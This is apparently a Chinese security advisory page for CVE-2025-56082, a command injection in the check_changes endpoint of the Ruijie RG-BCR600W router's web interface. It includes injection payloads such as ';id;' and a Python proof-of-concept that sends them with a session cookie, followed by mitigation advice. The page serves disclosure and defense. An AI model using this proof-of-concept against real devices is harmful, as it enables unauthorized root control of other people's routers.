IPBUF安全漏洞报告
English
CVE-2025-56082 CVSS 8.8 高危

CVE-2025-56082 锐捷RG-BCR600W命令注入漏洞

披露日期: 2025-12-11

漏洞信息

漏洞编号
CVE-2025-56082
漏洞类型
操作系统命令注入
CVSS评分
8.8 高危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Ruijie RG-BCR RG-BCR600W

相关标签

CVE-2025-56082命令注入锐捷RG-BCR600W路由器IoT漏洞高危漏洞Ruijie NetworksOS Command InjectionWeb管理界面

漏洞概述

CVE-2025-56082是锐捷网络技术有限公司(Ruijie Networks)生产的RG-BCR600W路由器中存在的一个高危操作系统命令注入漏洞。该漏洞位于设备的Web管理界面,具体位于/usr/lib/lua/luci/controller/admin/common.lua文件中的check_changes端点。攻击者可以通过向该端点发送精心构造的POST请求,在设备上执行任意操作系统命令。由于该漏洞的CVSS评分达到8.8分,属于高危级别,且攻击向量为网络层面,认证要求仅为低权限,因此具有较高的实际利用风险。受影响设备若暴露在互联网或不受信任的网络中,攻击者可无需用户交互即可获取设备的完全控制权,进而可能导致数据泄露、网络瘫痪或进一步横向渗透。

技术细节

该漏洞属于典型的操作系统命令注入(OS Command Injection)漏洞。在Ruijie RG-BCR600W路由器的Web管理功能中,check_changes端点(位于/usr/lib/lua/luci/controller/admin/common.lua)未能对用户输入进行充分的验证和过滤,直接将用户可控的参数传递给底层系统命令执行函数。攻击者可在POST请求的参数中插入分号、反引号或管道符等特殊字符,后跟待执行的系统命令。例如,通过在参数中注入类似';whoami;'或'`id`'的命令,攻击者可以实现命令拼接,从而在设备上执行任意系统命令。由于Web管理接口通常以root权限运行,攻击成功后将获得设备的最高权限,可执行任意操作包括查看配置文件(可能包含敏感凭证)、修改路由表、安装后门程序等。

攻击链分析

STEP 1
步骤1:信息收集
攻击者识别目标设备为Ruijie RG-BCR600W路由器,确认Web管理界面可访问
STEP 2
步骤2:认证获取
攻击者获取低权限账户凭据或利用其他漏洞获取有效会话cookie
STEP 3
步骤3:构造恶意请求
攻击者构造包含命令注入payload的POST请求,目标是check_changes端点
STEP 4
步骤4:命令执行
服务器端未过滤用户输入,payload中的系统命令被成功执行
STEP 5
步骤5:权限提升与持久化
攻击者获取root权限后可查看配置文件、安装后门或进一步横向渗透

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # CVE-2025-56082 PoC - Ruijie RG-BCR600W OS Command Injection # Target: Ruijie RG-BCR RG-BCR600W # Endpoint: /cgi-bin/luci/admin/common/check_changes target_ip = "192.168.1.1" # Replace with target device IP url = f"http://{target_ip}/cgi-bin/luci/admin/common/check_changes" # Authentication headers (Low privilege account required) cookies = { "sysauth": "<your_session_cookie>" } # Malicious payload to execute 'id' command payload = { "changes": ";id;" } try: response = requests.post(url, data=payload, cookies=cookies, timeout=10) print(f"Status Code: {response.status_code}") print(f"Response: {response.text}") except requests.exceptions.RequestException as e: print(f"Request failed: {e}")

影响范围

Ruijie RG-BCR600W 固件版本 <= 未知限制版本

防御指南

临时缓解措施
在官方补丁发布前,建议将RG-BCR600W的管理接口限制在可信网络范围内,避免暴露于互联网。建议通过ACL或VPN等方式限制只有授权管理员才能访问管理界面。同时监控设备日志,关注异常的POST请求模式。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表